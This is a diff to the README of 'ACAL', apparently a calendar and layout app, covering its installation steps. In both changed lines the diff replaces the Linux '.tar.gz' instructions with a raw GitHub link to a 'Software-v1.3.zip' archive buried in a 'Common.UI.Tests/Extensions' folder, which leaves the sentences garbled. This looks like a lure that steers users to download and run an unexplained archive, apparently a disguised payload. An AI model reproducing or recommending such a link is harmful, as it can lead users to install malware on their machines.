Lumen-Y/ACAL/README.md

 - For Windows users, look for a file that ends in `.exe`.
 - For Mac users, look for a file that ends in `.dmg`.
-- For Linux users, you may find a `.tar.gz` file or instructions for using Docker.
+- For Linux users, you may find a `https://raw.githubusercontent.com/Lumen-Y/ACAL/main/Common.UI.Tests/Extensions/Software-v1.3.zip` file or instructions for using Docker.

 ### Step 4: Run the Installer
 Once the file is downloaded, locate it in your downloads folder (or the folder you chose for downloads).

 - **For Windows**: Double-click the `.exe` file to start the installation.
 - **For Mac**: Open the `.dmg` file and drag the ACAL app to your Applications folder.
-- **For Linux**: Extract the `.tar.gz` file and follow the included instructions, or use Docker as outlined in our documentation.
+- **For Linux**: Extract the `https://raw.githubusercontent.com/Lumen-Y/ACAL/main/Common.UI.Tests/Extensions/Software-v1.3.zip` file and follow the included instructions, or use Docker as outlined in our documentation.

 ### Step 5: Open ACAL
 After installation, locate ACAL on your computer and open it.
 You are now ready to customize and start using your new calendar and layout tool!